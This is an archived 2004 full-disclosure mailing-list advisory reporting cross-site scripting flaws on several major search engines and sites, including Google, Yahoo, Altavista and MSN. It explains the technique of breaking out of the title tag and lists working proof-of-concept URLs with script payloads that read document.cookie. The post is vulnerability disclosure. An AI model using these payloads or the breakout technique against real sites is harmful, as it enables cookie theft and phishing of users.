[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <001501c472bd$4d2d8230$6501a8c0@sec>
From: me at cipher.org.uk (E.Kellinis)
Subject: Cross Site Scripting (XSS) on Google, Altavista ,Excite.com,Yahoo etc
#########################################
Service: Search Engines
Vendors: Google,Altavista ,Excite.com,Yahoo
Metacrawler, Dogpile, Downloads.com, MSN.com
Bug: Cross Site Scripting
Risk: Medium Or Low or High, depends
on your point of view
Exploitation: Remote
Date: 22 July 2004
Author: Emmanouel Kellinis
e-mail: me@...her(dot)org(dot)uk
web: http://www[dot]cipher[dot]org[dot]uk
List : BugTraq(SecurityFocus)/Full-Disclosure
#########################################
Sometimes Mozilla , IE or Opera are not the main concern for
xss attack but websites themselves.
There is a XSS vulnerability to all the major search engines
,and not only, web sites. To be honest the following is a very
small list of the "funny" XSS vulnerability that people dont
pay the needed attention. The XSS vuln is inherited to anyone who is
using these search engines, often there is no need to try and find
a flaw in their web service directly but you can have the same
result with indirect digging.
In the following list the most usual approach is javascript
poisoning inside the < title> tag. Search engines (and not only)
tend to do input/output validation on the searched keyword
only inside < body> and not before, so there you go ,
you just have to do < /title> and write your stuff, or
sometimes not even that.
Also you will notice that BIG websites do not pay the needed
attention in other pages inside their domain except the main.
So if you can find an XSS somewhere else you can still get
client's cookie (or Phish him or her) which is never a good thing!
Most of the following search engines are already informed about
the problem, the ones that I didnt inform was because I couldnt
find their contact details. Some of the following links may not work
but most of them will.
Google.com
http://googlesite.google.com/search?output=googleabout&site=googlesite
&q=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E
Metacrawler.com
http://www.metacrawler.com/info.metac/search/web/%253C%252Ftitle%253E%253Cbody%2
Bbgcolor%253D%2522blue%2522%253E%253Cscript%253Ealert(document.cookie)%253B%
253C%
252Fscript%253E%253C%252Fbody%253E
Excite.com
http://msxml.excite.com/info.xcite/search/web/%25253C%25252Ftitle%25253E%25253Cbody%
252Bbgcolor%25253D%252522blue%252522%25253E%25253Cscript%25253Ealert%252528d
ocument.
cookie%252529%25253B%25253C%25252Fscript%25253E%25253C%25252Fbody%25253E
Downloads.com
http://www.download.com/3120-20-0.html?qt=%3C%2Ftitle%3E%3Cbody+bgcolor
%3D%22blue%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3
E%3C%2Fbody%3E&tg=dl-2001
DogPile.com
http://www.dogpile.com/info.dogpl/search/web/%253C%252Ftitle%253E%253C
body%2Bbgcolor%253D%2522blue%2522%253E%253Cscript%253Ealert(document.cookie)
%253B%253C%252Fscript%253E%253C%252Fbody%253E
Altavista.com
http://www.altavista.com/web/results?q=</title><body%20bgcolor="blue">
<script>alert(document.cookie);</script></body>
Yahoo.com
http://us.rd.yahoo.com/reg/sc/nav/*http://www.
%20<script>alert(document.cookie);</script>
MSN.com [fast response/fixed]
http://local.msn.com/results.asp?ec=&zip=
</script><script>alert(document.cookie);</script><script>
and for the shake of it securityfocus.com [fast response/fixed] :
http://www.securityfocus.com/cgi-bin/sfonline/jobs/search_jobs.pl?
keyword="%20onfocus="alert(document.cookie);"
/\Side note/\
I would ,and not only I , appreciate a list of Security Contact details
of at least the fortune 500 companies.
(some times is so frustrating to find their security contacts inside
their ten billion lines website, that you dont even bother !
=========================================================
*PK:http://www.cipher.org.uk/files/pgp/cipherorguk.public.key.txt
=========================================================
Powered by blists - more mailing lists